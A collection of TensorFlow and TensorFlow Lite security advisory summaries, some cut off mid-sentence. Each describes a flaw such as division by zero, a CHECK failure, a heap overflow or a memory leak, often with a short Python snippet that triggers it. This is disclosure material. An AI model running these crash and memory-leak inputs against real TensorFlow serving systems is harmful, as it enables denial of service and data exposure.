The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseConcat

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …

CHECK-fail in DrawBoundingBoxes

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

CHECK-fail in AddManySparseToTensorsMap

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)

CHECK-fail in `tf.raw_ops.RFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `tf.raw_ops.IRFFT`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.

CHECK-fail in `QuantizeAndDequantizeV4Grad`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)

CHECK-fail in `LoadAndRemapMatrix`

An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)

CHECK-fail in `CTCGreedyDecoder`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

CHECK-fail due to integer overflow

An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )

2020

Write to immutable memory region in TensorFlow

The tf.raw_ops.ImmutableConst operation returns a constant tensor created from a memory mapped file which is assumed immutable. However, if the type of the tensor is not an integral type, the operation crashes the Python interpreter as it tries to write to the memory area: >>> import tensorflow as tf >>> with open('/tmp/test.txt','w') as f: f.write('a'*128) >>> tf.raw_ops.ImmutableConst(dtype=tf.string,shape=2, memory_region_name='/tmp/test.txt') If the file is too small, TensorFlow properly returns an error as …

Uninitialized memory access in TensorFlow

Under certain cases, a saved model can trigger use of uninitialized values during code execution. This is caused by having tensor buffers be filled with the default value of the type but forgetting to default initialize the quantized floating point types in Eigen: struct QUInt8 { QUInt8() {} // … uint8_t value; }; struct QInt16 { QInt16() {} // … int16_t value; }; struct QUInt16 { QUInt16() {} // … …

Lack of validation in data format attributes in TensorFlow

The tf.raw_ops.DataFormatVecPermute API does not validate the src_format and dst_format attributes. The code assumes that these two arguments define a permutation of NHWC. However, these assumptions are not checked and this can result in uninitialized memory accesses, read outside of bounds and even crashes. >>> import tensorflow as tf >>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='1234', dst_format='1234') <tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 757100143], dtype=int32)> … >>> tf.raw_ops.DataFormatVecPermute(x=[1,4], src_format='HHHH', dst_format='WWWW') <tf.Tensor: shape=(2,), dtype=int32, numpy=array([4, 32701], dtype=int32)> …

Heap out of bounds access in MakeEdge in TensorFlow

Under certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The MakeEdge function creates an edge between one output tensor of the src node (given by output_index) and the input slot of the dst node (given by input_index). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding DataType values …

Float cast overflow undefined behavior

When the boxes argument of tf.image.crop_and_resize has a very large value, the CPU kernel implementation receives it as a C++ nan floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault.

Segfault in Tensorflow

In eager mode, TensorFlow does not set the session state. Hence, calling tf.raw_ops.GetSessionHandle or tf.raw_ops.GetSessionHandleV2 results in a null pointer dereference: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45 In the above snippet, in eager mode, ctx->session_state() returns nullptr. Since code immediately dereferences this, we get a segmentation fault.

Segfault in Tensorflow

The RaggedCountSparseOutput implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the splits tensor generate a valid partitioning of the values tensor. Thus, the following code sets up conditions to cause a heap buffer overflow: auto per_batch_counts = BatchedMap<W>(num_batches); int batch_idx = 0; for (int idx = 0; idx < num_values; ++idx) { while (idx >= …

Segfault in Tensorflow

The tf.raw_ops.Switch operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.

Segfault and data corruption in tensorflow-lite

To mimic Python's indexing with negative values, TFLite uses ResolveAxis to convert negative values to positive indices. However, the only check that the converted index is now valid is only present in debug builds: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reduce.h#L68-L72 If the DCHECK does not trigger, then code execution moves ahead with a negative index. This, in turn, results in accessing data out of bounds which results in segfaults and/or data corruption.

Out of bounds write in tensorflow-lite

In TensorFlow Lite models using segment sum can trigger a write out bounds / segmentation fault if the segment ids are not sorted. Code assumes that the segment ids are in increasing order, using the last element of the tensor holding them to determine the dimensionality of output tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44 This results in allocating insufficient memory for the output tensor and in a write outside the bounds of the output …

Out of bounds access in tensorflow-lite

In TensorFlow Lite models using segment sum can trigger writes outside of bounds of heap allocated buffers by inserting negative elements in the segment ids tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631 Users having access to segment_ids_data can alter output_index and then write to outside of output_data buffer. This might result in a segmentation fault but it can also be used to further corrupt the memory and can be chained with other vulnerabilities to create …

Out of bounds access in tensorflow-lite

In TensorFlow Lite, saved models in the flatbuffer format use a double indexing scheme: a model has a set of subgraphs, each subgraph has a set of operators and each operator has a set of input/output tensors. The flatbuffer format uses indices for the tensors, indexing into an array of tensors that is owned by the subgraph. This results in a pattern of double array indexing when trying to get …

Null pointer dereference in tensorflow-lite

A crafted TFLite model can force a node to have as input a tensor backed by a nullptr buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with nullptr: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227 However, by changing the buffer index for a tensor …

Memory leak in Tensorflow

If a user passes a list of strings to dlpack.to_dlpack there is a memory leak following an expected validation failure: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L100-L104 The allocated memory is from https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L256 The issue occurs because the status argument during validation failures is not properly checked: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267 Since each of the above methods can return an error status, the status value must be checked before continuing.

Memory corruption in Tensorflow

The implementation of dlpack.to_dlpack can be made to use uninitialized memory resulting in further memory corruption. This is because the pybind11 glue code assumes that the argument is a tensor: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/tfe_wrapper.cc#L1361 However, there is nothing stopping users from passing in a Python object instead of a tensor. In [2]: tf.experimental.dlpack.to_dlpack([2]) ==1720623==WARNING: MemorySanitizer: use-of-uninitialized-value

Integer truncation in Shard API usage

The Shard API in TensorFlow expects the last argument to be a function taking two int64 (i.e., long long) arguments https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60 However, there are several places in TensorFlow where a lambda taking int or int32 arguments is being used https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205 https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L317-L318 In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this …

Heap buffer overflow in Tensorflow

The SparseCountSparseOutput and RaggedCountSparseOutput implementations don't validate that the weights tensor has the same shape as the data. The check exists for DenseCountSparseOutput, where both tensors are fully specified: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117 In the sparse and ragged count weights are still accessed in parallel with the data: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201 But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the …

Heap buffer overflow in Tensorflow

The RaggedCountSparseOutput implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the splits tensor generate a valid partitioning of the values tensor. Hence, this code is prone to heap buffer overflow: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L251 If split_values does not end with a value at least num_values then the while loop condition will trigger a read outside of the bounds …

Heap buffer overflow in Tensorflow

The SparseCountSparseOutput implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the indices tensor has the same shape as the values one. The values in these tensors are always accessed in parallel: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L193-L195 Thus, a shape mismatch can result in accesses outside the bounds of heap allocated buffers.

Denial of service in tensorflow-lite

In TensorFlow Lite models using segment sum can trigger a denial of service by causing an out of memory allocation in the implementation of segment sum. Since code uses the last element of the tensor holding them to determine the dimensionality of output tensor, attackers can use a very large value to trigger a large allocation: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44

Denial of Service in Tensorflow

By controlling the fill argument of tf.strings.as_string, a malicious attacker is able to trigger a format string vulnerability due to the way the internal format use in a printf call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74 This can result in unexpected output: In [1]: tf.strings.as_string(input=[1234], width=6, fill='-') Out[1]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['1234 '], dtype=object)> In [2]: tf.strings.as_string(input=[1234], width=6, fill='+') Out[2]: <tf.Tensor: shape=(1,), dtype=string, numpy=array([' +1234'], dtype=object)> In [3]: tf.strings.as_string(input=[1234], width=6, fill="h") Out[3]: <tf.Tensor: …

Denial of Service in Tensorflow

The SparseCountSparseOutput implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the indices tensor has rank 2. This tensor must be a matrix because code assumes its elements are accessed as elements of a matrix: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L185 However, malicious users can pass in tensors of different rank, resulting in a CHECK assertion failure and a crash. This can be used …

Denial of Service in Tensorflow

The RaggedCountSparseOutput does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the splits tensor has the minimum required number of elements. Code uses this quantity to initialize a different data structure: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L241-L244 Since BatchedMap is equivalent to a vector, it needs to have at least one element to not be nullptr. If user passes a splits tensor that is empty …

Denial of Service in Tensorflow

The SparseFillEmptyRowsGrad implementation has incomplete validation of the shapes of its arguments: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L235-L241 Although reverse_index_map_t and grad_values_t are accessed in a similar pattern, only reverse_index_map_t is validated to be of proper shape. Hence, malicious users can pass a bad grad_values_t to trigger an assertion failure in vec, causing denial of service in serving installations.

Denial of Service in Tensorflow

Changing the TensorFlow's SavedModel protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using tensorflow-serving or other inference-as-a-service installments. We have added fixes to this in f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports …

Data leak in Tensorflow

The data_splits argument of tf.raw_ops.StringNGrams lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory >>> tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False) StringNGrams(ngrams=<tf.Tensor: shape=(6,), dtype=string, numpy= array([b'aa bb cc', b'bb cc dd', b'cc dd ee', b'dd ee ff', b'ee ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00', b'ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00 \x9b~\xa8q\x7f\x00\x00p\xf5j\xa7q\x7f\x00\x00H\xf8j\xa7q\x7f\x00\x00\xf0\xf3\xf7\x85q\x7f\x00\x00}\xa6\x00\x00\x00\x00\x00\xa6\x00\x00\x00\x00\x00\xb0\xeb\x9bq\x7f\x00'],… All the binary strings after ee ff …

Data corruption in tensorflow-lite

When determining the common dimension size of two tensors, TFLite uses a DCHECK which is no-op outside of debug compilation modes: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/types.h#L437-L442 Since the function always returns the dimension of the first tensor, malicious attackers can craft cases where this is larger than that of the second tensor. In turn, this would result in reads/writes outside of bounds since the interpreter will wrongly assume that there is enough data in …

